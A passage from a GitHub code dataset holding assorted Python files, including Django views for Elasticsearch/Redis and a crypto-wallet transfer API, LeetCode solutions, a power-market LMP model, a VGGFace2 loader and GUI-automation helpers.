YEAR_OF_BIRTH, SEX, PARAMS, TEAM_ID) VALUES (?, ?, ?, ?, ?, ?)\",\n (athlete_id, name, year_of_birth, sex, str(params), team_id))\n conn.commit()\n\n # Inserting results\n for result in results:\n athlete_id = result['athlete_id']\n game_id = result['game_id']\n sport_id = result['sport_id']\n event_id = result['event_id']\n medal = result['medal']\n cursor.execute(\"insert into results(athlete_id, game_id, sport_id, event_id, medal) values(?, ?, ?, ?, ?)\",\n (athlete_id, game_id, sport_id, event_id, medal))\n\n conn.commit()\n conn.close()\n","repo_name":"stsh1119/olympic_games","sub_path":"populate_tables/insert_to_db.py","file_name":"insert_to_db.py","file_ext":"py","file_size_in_byte":2150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"10544545372","text":"from django.shortcuts import render,get_object_or_404\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom datetime import datetime\nfrom cloudboost.settings import es,rds\nfrom django.views.decorators.csrf import csrf_exempt\n# import json\n\n\n\ndef cloudboost(request):\n template = loader.get_template('elasticsearch_and_redis_app/index.html')\n context = {} \n \n return HttpResponse(\"Hello, world. This is home page\"+template.render(context, request))\n\n@csrf_exempt\ndef index(request):\n # book = get_object_or_404(Books)\n if request.method == 'GET':\n \tkey=request.GET['key']\n \tresult=rds.get(key) \n \treturn HttpResponse(result)\n elif request.method == 'POST':\n \tmessage = request.POST['message']\n \tres1 = es.index(index=\"test-index\", doc_type='cloudboost', body={\"message\": message, \"timestamp\": datetime.now()})\n \tres2=rds.set(\"message\",message)#since I had to index only one item, i.e. message, I only create a key message,\n \t\t\t\t\t\t\t\t# otherwise I would have used list in Redis \t\n \t# res1=json.dumps(res1, sort_keys=False, indent=4, separators=(',', ': '))\n \tresponse=\"\\n\\n\".join([str(res1),str(res2)])\n \t\n \t# template = loader.get_template('elasticsearch_and_redis_app/insert.html')\n \t# context={}\n \treturn HttpResponse(response)\n \t\n else:\n \treturn HttpResponse(\"GET/POST required\")\n\ndef search(request):\n\tres = es.search(index=\"test-index\", body={\"query\": {\"match\": {\"message\": request.GET['message']} }})\n\tret = []\n\tfor hit in res['hits'][\"hits\"]:\n\t\tret.append(hit['_source'])\n\treturn HttpResponse(str(ret)) \n\n","repo_name":"nirmitgoyal/CloudBoost","sub_path":"cloudboost/elasticsearch_and_redis_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1612,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"22037817853","text":"from django.shortcuts import get_object_or_404\nfrom rest_framework import generics, permissions\nfrom .models import SenderWallet, ReceiverWallet, CreateTransaction\nfrom .serializers import SenderWalletCreateSerializer, SenderWalletRetrieveSerializer, ReceiverWalletSerializer, CreateTransactionSerializer\nimport requests\nimport json\nfrom django.core.cache import cache\n\n\nclass SenderWalletObject(generics.RetrieveDestroyAPIView):\n queryset = SenderWallet.objects.all()\n serializer_class = SenderWalletRetrieveSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n def get_object(self):\n cache_key = f'sender_wallet_{self.kwargs[\"pk\"]}'\n sender_wallet = cache.get(cache_key)\n\n if not sender_wallet:\n sender_wallet = get_object_or_404(SenderWallet, pk=self.kwargs['pk'])\n cache.set(cache_key, sender_wallet)\n\n return sender_wallet\n\n\nclass SenderWalletList(generics.ListCreateAPIView):\n queryset = SenderWallet.objects.all()\n permission_classes = [permissions.IsAuthenticated]\n\n def get_serializer_class(self):\n if self.request.method == 'POST':\n return SenderWalletCreateSerializer\n else:\n return SenderWalletRetrieveSerializer\n\n def perform_create(self, serializer):\n serializer.save(creator=self.request.user)\n\n\nclass ReceiverWalletList(generics.ListCreateAPIView):\n queryset = ReceiverWallet.objects.all()\n serializer_class = ReceiverWalletSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n def get_queryset(self):\n queryset = ReceiverWallet.objects.all()\n cache_key = 'receiver_wallets'\n\n receiver_wallets = cache.get(cache_key)\n if not receiver_wallets:\n receiver_wallets = list(queryset)\n cache.set(cache_key, receiver_wallets)\n\n return receiver_wallets\n\n\nclass ReceiverWalletObject(generics.RetrieveDestroyAPIView):\n queryset = ReceiverWallet.objects.all()\n serializer_class = ReceiverWalletSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n def get_object(self):\n cache_key = f'receiver_wallet_{self.kwargs[\"pk\"]}'\n receiver_wallet = cache.get(cache_key)\n\n if not receiver_wallet:\n receiver_wallet = get_object_or_404(ReceiverWallet, pk=self.kwargs['pk'])\n cache.set(cache_key, receiver_wallet)\n\n return receiver_wallet\n\n\nclass CreateTransactionsList(generics.ListCreateAPIView):\n queryset = CreateTransaction.objects.all()\n serializer_class = CreateTransactionSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n def perform_create(self, serializer):\n transaction_hash = self.get_response_from_transfer_request(serializer.validated_data)\n serializer.save(transaction_hash=transaction_hash, transaction_link=\"https://explorer.theta-testnet.polypore.xyz/transactions/\"+transaction_hash)\n\n def get_values(self, transaction):\n sender_wallet = transaction['from_address']\n receiver_wallet = transaction['to_address']\n\n return {'from_address': sender_wallet.from_address,\n \"seed\": sender_wallet.seed, \"to_address\": receiver_wallet.to_address, \"amount\": transaction['amount']}\n\n def get_response_from_transfer_request(self, transaction):\n response = self.get_values(transaction)\n data = {\"from_address\": response[\"from_address\"], \"to_address\": response[\"to_address\"], \"seed\": response[\"seed\"], \"amount\": response[\"amount\"]}\n headers = {'Content-Type': 'application/json'}\n print(\"data\", data)\n json_data = json.dumps(data)\n response = requests.post('http://ts:3000/api/broadcast-transaction/', data=json_data, headers=headers)\n if response.status_code == 201:\n data = response.json()\n return data['message']['transactionHash']\n else:\n print('API request failed with status code', response.status_code)\n\n\nclass CreateTransactionObject(generics.RetrieveDestroyAPIView):\n queryset = CreateTransaction.objects.all()\n serializer_class = CreateTransactionSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n\n","repo_name":"AminMortezaie/django-tutorial","sub_path":"ExchangeSystem/cosmos-app/transfer/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"25551229627","text":"# we learned how o handle exception, now lets learn how to raise\n# exceptions\n\n\ndef cal_age(age):\n if age <= 0:\n raise ValueError(\"Age can't be zero\")\n return 10/age\n\n\ntry:\n cal_age(0)\nexcept ValueError:\n print('Error')\n","repo_name":"aliahmadcse/Learning_Python","sub_path":"exceptions/raising_exceptions.py","file_name":"raising_exceptions.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"40214666957","text":"# https://leetcode.com/problems/permutation-in-string/description/\nfrom collections import Counter, defaultdict\n\nclass Solution:\n # time o(m*n), space = o(n*m) where m = len(s2), n=len(s1)\n def checkInclusion_sliding_window(self, s1: str, s2: str) -> bool:\n \"\"\"\n method 1: sliding window:\n \"\"\"\n char_map_s1 = Counter(s1)\n len_s1 = len(s1)\n for i in range(0, len(s2)-len_s1+1):\n char_map_window = Counter(s2[i:i+len_s1])\n if char_map_window == char_map_s1:\n return True\n return False\n \n @staticmethod\n def _counter(s:str) -> dict:\n char_map = defaultdict(int)\n for i in s:\n char_map[i] += 1\n return char_map\n \n # time o(m*n), space = o(26*2) where m = len(s2), n=len(s1)\n def checkInclusion_sliding_window_optimize_1(self, s1: str, s2: str) -> bool:\n \"\"\"\n method 2: sliding window optimized_1\n # todo: Do not use Counter() logic multiple time.\n \"\"\"\n len_s1 = len(s1)\n len_s2 = len(s2)\n\n # base case\n if len_s1 > len_s2:\n return False\n\n char_map_s1 = self._counter(s1)\n char_map_s2 = self._counter(s2[:len_s1])\n\n # linear time loop with window\n for j in range(len_s1, len_s2):\n # step 1: compare current window \n # to-do you can avoid this and do in constant time\n if char_map_s2 == char_map_s1:\n return True\n\n # step 2: add last_char in char_map\n last_char = s2[j]\n char_map_s2[last_char] += 1\n \n # steop 3: decrement/remove first_char in char_map\n first_char = s2[j-len_s1]\n char_map_s2[first_char] -= 1\n if char_map_s2[first_char] < 1:\n del char_map_s2[first_char]\n\n return char_map_s2 == char_map_s1\n\n # time o(m-n), space = o(min(26, n)) where m = len(s2), n=len(s1)\n def checkInclusion_sliding_window_optimize_2(self, s1: str, s2: str) -> bool:\n \"\"\"\n method 3: sliding window optimized_2\n \"\"\"\n len_s1 = len(s1)\n len_s2 = len(s2)\n\n # base case\n if len_s1 > len_s2:\n return False\n\n # calcualte first window counter_maps\n char_map_s2 = {}\n char_map_s1 = {}\n for i in range(len_s1):\n char_map_s1[s1[i]] = char_map_s1.get(s1[i], 0) + 1 \n char_map_s2[s2[i]] = char_map_s2.get(s2[i], 0) + 1\n\n # check how many item matches in first window\n matches=0\n for char, count in char_map_s1.items():\n matches += min(count, char_map_s2.get(char, 0))\n\n # scroll window till the last.\n for j in range(len_s1, len_s2):\n # base-condition: check if all char matches. in s2 \n if matches == len_s1:\n return True\n\n last_char = s2[j] # add this char to window\n first_char = s2[j-len_s1] # remove this char to window\n\n # step 1: add last_char in char_map\n char_map_s2[last_char] = char_map_s2.get(last_char, 0) + 1\n\n # adjust matches_counter for new char \n if char_map_s1.get(last_char) and char_map_s2[last_char] <= char_map_s1[last_char]:\n matches += 1\n # adjust matches_counter for remove char \n if char_map_s1.get(first_char) and char_map_s1[first_char] >= char_map_s2[first_char]:\n matches -= 1\n \n # step 3: decrement/remove first_char in char_map\n char_map_s2[first_char] -= 1\n if char_map_s2[first_char] < 1:\n del char_map_s2[first_char]\n\n return matches == len_s1","repo_name":"vKrypto/practice-dsa","sub_path":"problems/permutation-in-string.py","file_name":"permutation-in-string.py","file_ext":"py","file_size_in_byte":3755,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"1120939999","text":"def attempts(n):\n x = 1 # the value of x shall remain 1\n while x <= n:\n print(f\"attempt no: {str(x)}\")\n x += 1\n print(\"done\")\n\ndef count_down(start_count):\n current = start_count\n while current >= 0:\n print(current)\n current += -1\n print(\"done\")\n\n\ndef is_power_of_two(n):\n # Check if the number can be divided by two without a remainder\n while n % 2 == 0:\n n = n / 2\n if n == 0:\n return False\n # If after dividing by two the number is 1, it's a power of two\n if n == 1:\n return True\n return False\n\n\n\ndef decade_counter(year):\n\twhile year < 50:\n\t\tyear += 10\n\treturn year\n\n\n\n","repo_name":"Uzair-A-Jokhio/Python-language","sub_path":"Python_Scrpits/Basics/while loops.py","file_name":"while loops.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"20426986670","text":"import json\n\nfrom argparse import ArgumentParser\nfrom os.path import isfile\n\nfrom derek import transformer_from_props\nfrom derek.data.model import Document, Sentence, Paragraph\n\n\ndef build_argparser():\n parser = ArgumentParser(description=\"Lemmatize gazetteer file\")\n parser.add_argument('-input', type=str, dest='input_path', metavar='',\n required=True, help='path to input gazetteer file to lemmatize')\n parser.add_argument('-transformer_props', type=str, dest='transformer_props', metavar='',\n required=True, help='path to transformer props')\n parser.add_argument('-output', type=str, dest='output_path', metavar='',\n required=True, help='path to save lemmatized gazetteer')\n return parser\n\n\ndef _get_lemma(token, transformer):\n doc = Document(\"\", [token], [Sentence(0, 1)], [Paragraph(0, 1)])\n featured_doc = transformer.transform(doc)\n return featured_doc.token_features['lemmas'][0]\n\n\ndef lemmatize(input_path, output_path, transformers_props_path):\n with open(transformers_props_path, 'r', encoding='utf-8') as f, \\\n transformer_from_props(json.load(f)) as transformer, \\\n open(input_path, 'r', encoding='utf-8') as readfile, \\\n open(output_path, 'w', encoding='utf-8', newline='\\n') as outfile:\n for line in readfile:\n lemma = _get_lemma(line.strip(), transformer)\n outfile.write(lemma + \"\\n\")\n\n\ndef main():\n parser = build_argparser()\n args = parser.parse_args()\n input_path = args.input_path\n out_path = args.output_path\n transformers_props_path = args.transformer_props\n if isfile(input_path):\n lemmatize(input_path, out_path, transformers_props_path)\n else:\n raise FileNotFoundError()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"ispras-texterra/derek","sub_path":"tools/gazetteer_lemmatizer.py","file_name":"gazetteer_lemmatizer.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"40"} +{"seq_id":"43236053503","text":"from lmpnz.GuillaumeExample import price_making_algorithm\nfrom lmpnz.GuillaumeExample import economic_dispatch\nfrom lmpnz.GuillaumeExample import price_taking_algorithm\nimport imp\nimp.reload(economic_dispatch)\nimp.reload(price_taking_algorithm)\nimport json\nimport math\nimport numpy as np\nimport pandas as pd\nimport pyomo.environ as pyo\nimport lmpnz.Network.PriceBids.Load.Load as ld\nimport stored_path\nfrom lmpnz.GuillaumeExample import LMP\nfrom lmpnz.Network.PriceBids.Generator.Generator import Generator\nfrom lmpnz.Network.PriceBids.Load.Load import Load\nfrom lmpnz.Network.Topology.Topology import Topology as top\nimport matplotlib.pyplot as plt\n\n\ndef tweak_d(d, load_factor = 1.3, index_to_tweak = 10, load_factor_for_node=12.1):\n save = d[index_to_tweak].copy()\n save_d = d.copy()\n d[index_to_tweak] = save\n d = load_factor * save_d.copy()\n d[index_to_tweak] = save * load_factor_for_node\n return d\n\n\ndef add_loads_to_topology(AMB_network):\n Existing_sub_nodes = ld.get_existing_subnodes()\n historical_loads = ld.get_historical_loads()\n Simp_nodes_dict = ld.get_nodes_to_subnodes()\n Simp_nodes_dict[\"MAN\"] = [\"MAN2201\"]\n Existing_sub_nodes.append(\"MAN2201\")\n nodes_to_index = pd.read_csv(stored_path.main_path + '/data/ABM/ABM_Nodes.csv')\n for i, node in enumerate(AMB_network.names_2_nodes.keys()):\n # print(\"Load added at node : \" + node)\n index = nodes_to_index[nodes_to_index[\"Node names\"] == node][\"Node index\"].values[0]\n load = Load(node, node, index, type=\"real_load\")\n load.add_load_data(historical_loads, Simp_nodes_dict, Existing_sub_nodes)\n AMB_network.add_load(load)\n return AMB_network\n\ndef add_generators_to_topology(AMB_network):\n file_path = stored_path.main_path + '/data/generators/generator_adjacency_matrix_dict1.json'\n with open(file_path) as f:\n data = json.loads(f.read())\n\n number_of_added_generators = 0\n for name_generator in data.keys():\n L_ = data[name_generator]\n try:\n if type(L_[0]) != float:\n if not math.isnan(L_[-2]):\n if L_[-1] == 'Hydro':\n P_min = L_[-2]\n else:\n P_min = 0\n\n g = Generator(name_generator, L_[0], 0, L_[-1], Pmax=L_[-2], Pmin=P_min,\n marginal_cost=np.array(L_[1]))\n AMB_network.add_generator(g)\n number_of_added_generators += 1\n except:\n pass\n\n return AMB_network\n\n\ndef get_load_matrix(AMB_network, day, Horizon_T):\n d = []\n for k, node in enumerate(AMB_network.loads.keys()):\n d.append([])\n for j in range(day * 48, day * 48 + Horizon_T):\n d[k].append(1 * 1000 * AMB_network.loads[node][0].return_d(1 + j // 48, j % 48 + 1))\n d = np.array(d)\n return d\n\n\ndef get_producers_matrices(AMB_network, day, Horizon_T):\n n_generator = AMB_network.get_number_of_gen()\n b = np.zeros((n_generator, Horizon_T))\n P_max = np.zeros((n_generator, Horizon_T))\n P_min = np.zeros((n_generator, Horizon_T))\n for node in AMB_network.generators.keys():\n for g in AMB_network.generators[node]:\n for i, j in enumerate(range(day * (48-1), day * (48-1) + Horizon_T)):\n if g.name == \"diesel_gen\":\n pmax, pmin, a = 500, 0, 100\n else:\n pmax, pmin, a = LMP.get_P_min_a(g.name, 1 + j // 48, j % 48 + 1, g.type)\n P_max[g.index, i] = pmax\n P_min[g.index, i] = pmin if g.type == \"Hydro\" else 0\n b[g.index, i] = a if a > 0 else np.random.randint(0, 50)\n return b, P_max, P_min\n\n\ndef get_basics(Horizon_T, day):\n AMB_network = top(network=\"ABM\")\n AMB_network = add_loads_to_topology(AMB_network)\n AMB_network = add_generators_to_topology(AMB_network)\n H, h = AMB_network.H, AMB_network.h\n print(\"Topology loaded\")\n \"\"\"\n Tweak case : add a fake generator\n \"\"\"\n node_name = \"MDN\"\n AMB_network.add_generator(Generator(\"diesel_gen\", node_name, 0, 0, Pmax=200, Pmin=0,\n marginal_cost=[0, 0]))\n\n \"\"\"\n Get the load data\n \"\"\"\n d = get_load_matrix(AMB_network, day, Horizon_T)\n d = tweak_d(d, load_factor = 1.3, index_to_tweak = 10, load_factor_for_node=12.1)\n # d = tweak_d(d, load_factor=1, index_to_tweak=10, load_factor_for_node=1)\n print(\"Load historical data loaded and tweaked\")\n\n \"\"\"\n Get the bid matrices\n \"\"\"\n b, P_max, P_min = get_producers_matrices(AMB_network, day, Horizon_T)\n print(\"Load historical bids\")\n\n \"\"\"\n Load now the topology of generators\n \"\"\"\n Mn = AMB_network.Mn\n return H, h, Mn, b, P_max, P_min, d\n\n\ndef baseline_prices():\n Horizon_T, day = 48, 2\n H, h, Mn, b, P_max, P_min, d = get_basics(Horizon_T, day)\n n = d.shape[0] # number of nodes\n\n \"\"\"\n Find lambdas for the day (they will be deemed exogenous)\n \"\"\"\n lambdas = np.zeros((n, Horizon_T))\n gammas = np.zeros(Horizon_T)\n for j in range(Horizon_T):\n \"\"\"\n Here is a new optimization framework which is rigoursely the same as devised in the algorithm, \n WARNING this is just for time period j.\n\n We input the c and q, the price and quantity offered by the battery. Here 0,0 because we want the LMPs\n without the battery\n \"\"\"\n c = 0\n q = 0\n model = economic_dispatch.run_ED_1period(d[:, j], b[:, j], P_max[:, j], P_min[:, j], c, q, H, h, Mn)\n for k in range(n):\n lambdas[k, j] = model.dual[model.injection_definition[k]] # here we store the dual variables of the injection definition constraint\n\n gammas[j] = model.dual[model.injection_balance]\n\n import matplotlib.pyplot as plt\n fig, axs = plt.subplots(2, sharex=True, figsize=(15, 10), dpi=80, facecolor='w', edgecolor='k')\n plt.subplots_adjust(hspace=.0)\n fs = 20\n\n # if Node is not None:\n # Node_name = Nodes[Node]\n # Nodes = [None] * len(Nodes)\n # Nodes[Node] = Node_name\n # Y = np.array(LMP_df[[f'{i}' for i in range(t)]][1:]).T - np.array([gamma_df.gamma[:t].tolist()]).T\n # else:\n # Y = np.array(LMP_df[[f'{i}' for i in range(t)]][1:]).T - np.array([gamma_df.gamma[:t].tolist()]).T\n\n axs[0].plot(gammas)\n axs[0].set_ylabel('Average price $\\gamma$ [\\$/MW]', fontsize=fs)\n axs[0].set_ylim(bottom=0)\n axs[0].set_title('Average price and congestion curves\\n Baseline model, Sept. 2nd, 2019', fontsize=fs)\n axs[0].grid()\n\n for i in range(1, 20):\n axs[1].plot(lambdas[i]-gammas, label=f'{i}')\n # for i, y_arr, label in zip(range(1, 20), Y[1:, :], Nodes[1:].tolist()):\n # if (label == 'MDN') | (label == 'HEN'):\n # axs[1].plot(y_arr, label=f'{i} : {label}', linewidth=5)\n # else:\n # axs[1].plot(y_arr, label=f'{i} : {label}')\n\n axs[1].legend()\n axs[1].set_ylabel('$\\lambda - \\gamma$ [\\$/MW]', fontsize=fs)\n axs[1].set_xlabel('Time [h]', fontsize=fs)\n plt.xticks(range(0, 48, 2), range(24))\n axs[1].set_xlim([0, 48])\n axs[1].grid()\n plt.show()","repo_name":"GuillaumeGoujard/LMP_NZ","sub_path":"archive/article_example/PMker_26September.py","file_name":"PMker_26September.py","file_ext":"py","file_size_in_byte":7179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"17297978610","text":"# Global variables for the program\nimport numpy as np\nimport math\n\n\nclass Config:\n # tuning parameters\n n_jobs = 1 # number of simultaneous threads !!always less than processor has!!!\n flag_train_all = True\n\n steps_vi = 200 # steps for value iteration\n\n # environment\n env_max_iterations = 50\n\n # Q learning\n epochs_ql = 100 # number of epochs for q_learning\n alpha_ql = 0.002 # learning rate\n epsilon_ql = 1 # initial value of epsilon\n epsilon_min_ql = 0.1\n epsilon_decay_ql = 0.9995 # epsilon decay each iteration\n\n # DQN\n flag_train_dqn = True\n episodes_dqn = 2 # number of episodes\n n_seeds = 2\n train_wait = 30 # train_wait = 10 # number of steps it waits to train the model\n learning_rate_dqn = 0.0001\n epsilon_decay_dqn = 0.999\n dqn_evaluate_reps = 2 # times the dqn model is evaluated to average the score afterwards\n\n # Evaluate policies\n rep_eval_pol = 3\n\n # DRQN\n trace_length = 5 # Temporal dimension: length of sequence to feed the neural network\n episodes_drqn = episodes_dqn\n drqn_evaluate_reps = dqn_evaluate_reps\n\n # original states\n N_states = 2\n N_actions = 2\n states = np.array([0, 1])\n actions = np.array([0, 1])\n\n def __init__(self):\n self.gamma = 0.99 # discount factor\n self.L = 2 # length of the frame\n self.lambda_on = 6\n self.lambda_off = 3\n self.ts = 0.1 # period of sample\n\n # reward\n self.rnt = -.5 # no transmission reward when the primary is not transmitting\n self.rt = 1 # transmitting when primary not transmitting\n self.rp = .5 # not transmitting when primary transmitting\n self.rc = -1.5 # transmitting when primary transmitting -> collision\n\n self.update()\n\n def update(self):\n # update the transition and rewards matrix\n self.exponent = math.exp(- (self.lambda_on + self.lambda_off) * self.ts)\n self.p00 = self.lambda_on / (self.lambda_on + self.lambda_off) + self.lambda_off / (\n self.lambda_on + self.lambda_off) * self.exponent\n self.p01 = 1 - self.p00\n self.p11 = self.lambda_off / (self.lambda_on + self.lambda_off) + self.lambda_on / (\n self.lambda_on + self.lambda_off) * self.exponent\n self.p10 = 1 - self.p11\n\n self.P = np.array([[self.p00, self.p01],\n [self.p00 ** (self.L + 1), (1 - self.p00 ** (self.L + 1))],\n [self.p10, self.p11],\n [self.p10 * self.p00 ** self.L, (1 - self.p10 * self.p00 ** self.L)]])\n\n self.R = np.array(\n [self.rnt * self.p00 + self.rp * self.p01,\n self.rt * self.p00 ** (self.L + 1) + self.rc * (1 - self.p00 ** (self.L + 1)),\n self.rp * self.p11 + self.rnt * self.p10,\n self.rc * (1 - self.p10 * self.p00 ** self.L) + self.rt * self.p10 * self.p00 ** self.L])\n self.instant_reward = np.array([[self.rnt, self.rp], # r(0,0,0) r(0,0,1) # this is the reward of r(s,a,s')\n [self.rt, self.rc], # r(0,1,0) r(0,1,1)\n [self.rnt, self.rp], # r(1,0,0) r(1,0,1)\n [self.rt, self.rc]]) # r(1,1,0) r(1,1,1)","repo_name":"DavidMaister/tfm_rl","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":3337,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"22279062431","text":"#!/usr/bin/env python\n\nimport collections\nimport os\n\nimport numpy as np\nimport PIL.Image\nimport scipy.io\nimport torch\nfrom torch.utils import data\nimport torchvision.transforms\nfrom torchvision.datasets.folder import default_loader\n\n\nclass VGG_Faces2(data.Dataset):\n\n mean_bgr = np.array([91.4953, 103.8827, 131.0912]) # from resnet50_ft.prototxt\n\n def __init__(self, root, train, transform=None):\n \"\"\"\n :param root: dataset directory\n :param image_list_file: contains image file names under root\n :param id_label_dict: X[class_id] -> label\n :param split: train or valid\n :param transform:\n :param horizontal_flip:\n :param upper: max number of image used for debug\n \"\"\"\n self.root = root\n\n if train:\n self.file_list = torch.load(self.root + '/train_list.pt')\n else:\n self.file_list = torch.load(self.root + '/test_list.pt')\n self.bboxes = torch.load(self.root + '/bboxes.pt')\n\n self.transform = transform\n self.loader = default_loader\n\n # self.img_info = []\n # with open(self.image_list_file, 'r') as f:\n # for i, img_file in enumerate(f):\n # img_file = img_file.strip() # e.g. train/n004332/0317_01.jpg\n # class_id = img_file.split(\"/\")[1] # like n004332\n # label = self.id_label_dict[class_id]\n # self.img_info.append({\n # 'cid': class_id,\n # 'img': img_file,\n # 'lbl': label,\n # })\n # if i % 1000 == 0:\n # print(\"processing: {} images for {}\".format(i, self.split))\n # if upper and i == upper - 1: # for debug purpose\n # break\n\n def __len__(self):\n return len(self.file_list)\n\n def __getitem__(self, index):\n img_file, label, bbox_id = self.file_list[index]\n bbox = self.bboxes[bbox_id]\n sample = self.loader(f'{self.root}/{img_file}')\n target = torch.tensor(label)\n x, y, w, h = bbox\n\n sample = sample.crop((x,y, x+w, y+h))\n\n if self.transform:\n sample = self.transform(sample)\n\n return sample, target\n\n def transform(self, img):\n img = img[:, :, ::-1] # RGB -> BGR\n img = img.astype(np.float32)\n img -= self.mean_bgr\n img = img.transpose(2, 0, 1) # C x H x W\n img = torch.from_numpy(img).float()\n return img\n\n def untransform(self, img, lbl):\n img = img.numpy()\n img = img.transpose(1, 2, 0)\n img += self.mean_bgr\n img = img.astype(np.uint8)\n img = img[:, :, ::-1]\n return img, lbl","repo_name":"ebagdasa/backdoors101","sub_path":"dataset/vggface.py","file_name":"vggface.py","file_ext":"py","file_size_in_byte":2720,"program_lang":"python","lang":"en","doc_type":"code","stars":289,"dataset":"github-code","pt":"40"} +{"seq_id":"37688256686","text":"import sys\n\nimport aircv as ac\nimport cv2\nfrom PIL import ImageGrab\nimport time\nimport numpy as np\nimport xlrd\nimport pyautogui\nimport requests\nimport json\nfrom lib.pic import *\nfrom pywinauto.base_wrapper import BaseWrapper\nfrom pywinauto import application\nimport os\n\ndef log(content):\n currentTime = time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime())\n date = time.strftime(\"%Y_%m_%d\")\n with open(\"../log/{}.log\".format(date),\"a+\",encoding=\"utf-8\") as f:\n # f.write(currentTime + \" \" + content + \"\\n\")\n f.write(\"{} {}\\n\".format(currentTime,content))\n\ndef dragwindow(appwindow, pic=ihomeicon):\n \"\"\"\n :type appwindow: BaseWrapper\n :param pic:str\n :return:\n \"\"\"\n saveimage(appwindow)\n result = matchimg(picturename, pic)\n if result:\n appwindow.click_input(coords=floattoint(result.get(\"result\")))\n pyautogui.mouseDown()\n pyautogui.dragRel(-100, -100, duration=0.25)\n pyautogui.mouseUp()\n\n\ndef findwindow(app, titlename=\"艾佳生活\", timeout=180):\n \"\"\"\n :type app:application.Application\n :param titlename: str\n :param timeout:int\n :rtype: BaseWrapper\n \"\"\"\n while True:\n if timeout > 0:\n try:\n App = app.connect(title=titlename)\n print(\"find window :\" + titlename)\n App[titlename].set_focus()\n return App[titlename]\n except:\n time.sleep(1)\n timeout = timeout - 1\n else:\n print(\"timeout to find window\")\n sys.exit()\n\n\ndef matchimgall(imgsrc, imgobj, confidence=0.85): # imgsrc=原始图像,imgobj=待查找的图片\n \"\"\"\n :param imgsrc:\n :param imgobj:\n :param confidence:\n :rtype:dict\n :return:\n\n Args:\n imgsrc(string): 图像、素材\n imgobj(string): 需要查找的图片\n confidence: 阈值,当相识度小于该阈值的时候,就忽略掉\n\n Returns:\n A tuple of found [(point, score), ...]\n \"\"\"\n\n confidence = getattr(matchimg, \"confidence\", confidence)\n imsrc = cv2.imdecode(np.fromfile(imgsrc, dtype=np.uint8), cv2.IMREAD_UNCHANGED)\n imobj = cv2.imdecode(np.fromfile(imgobj, dtype=np.uint8), cv2.IMREAD_UNCHANGED)\n\n match_result = ac.find_all_template(imsrc, imobj, confidence)\n # if match_result is not None:\n # match_result['shape'] = (imsrc.shape[1], imsrc.shape[0]) # 获取原始图片宽高 0为高,1为宽\n print(imgsrc, imgobj, match_result)\n return match_result\n\n\ndef matchimg(imgsrc, imgobj, confidence=0.85): # imgsrc=原始图像,imgobj=待查找的图片\n \"\"\"\n :param imgsrc:\n :param imgobj:\n :param confidence:\n :rtype:dict\n :return:\n\n Args:\n imgsrc(string): 图像、素材\n imgobj(string): 需要查找的图片\n confidence: 阈值,当相识度小于该阈值的时候,就忽略掉\n\n Returns:\n A tuple of found [(point, score), ...]\n \"\"\"\n confidence = getattr(matchimg, \"confidence\", confidence)\n imsrc = cv2.imdecode(np.fromfile(imgsrc, dtype=np.uint8), cv2.IMREAD_UNCHANGED)\n imobj = cv2.imdecode(np.fromfile(imgobj, dtype=np.uint8), cv2.IMREAD_UNCHANGED)\n\n match_result = ac.find_template(imsrc, imobj, confidence)\n # if match_result is not None:\n # match_result['shape'] = (imsrc.shape[1], imsrc.shape[0]) # 获取原始图片宽高 0为高,1为宽\n print(imgsrc, imgobj, match_result)\n # log(\"{} {} {}\".format(imgsrc, imgobj, match_result))\n return match_result\n\n\ndef floattoint(changeobject, xoffset=0, yoffset=0):\n \"\"\"\n :type changeobject: tuple\n :param xoffset: 根据当前坐标x平移xoffset\n :param yoffset: 根据当前左边y平移yoffset\n :return:把浮点型左边转换成整形坐标\n :rtype:tuple\n \"\"\"\n # intx 横向坐标偏移量\n # inty 纵向坐标偏移量\n if isinstance(changeobject, tuple):\n a = int(changeobject[0]) + xoffset\n b = int(changeobject[1]) + yoffset\n resultobject = (a, b)\n return resultobject\n\n\ndef saveimage(appwindow, fullscreenpic=picturename):\n \"\"\"\n :type appwindow: BaseWrapper\n :param fullscreenpic: 保存的图片路径和名字\n :return:\n \"\"\"\n print(appwindow.rectangle()) # 获取应用图形矩阵\n\n left = appwindow.rectangle().left\n right = appwindow.rectangle().right\n top = appwindow.rectangle().top\n bottom = appwindow.rectangle().bottom\n\n bbox = (left, top, right, bottom) # 图形矩阵\n img = ImageGrab.grab(bbox)\n img.save(fullscreenpic)\n # img.show()\n\ndef savePic(appwindow,info):\n \"\"\"\n :type appwindow: BaseWrapper\n :return:\n \"\"\"\n\n print(appwindow.rectangle()) # 获取应用图形矩阵\n\n left = appwindow.rectangle().left\n right = appwindow.rectangle().right\n top = appwindow.rectangle().top\n bottom = appwindow.rectangle().bottom\n\n bbox = (left, top, right, bottom) # 图形矩阵\n img = ImageGrab.grab(bbox)\n\n date = time.strftime(\"%Y_%m_%d\")\n if not os.path.exists(r\"../log/logPic/{}\".format(date)):\n 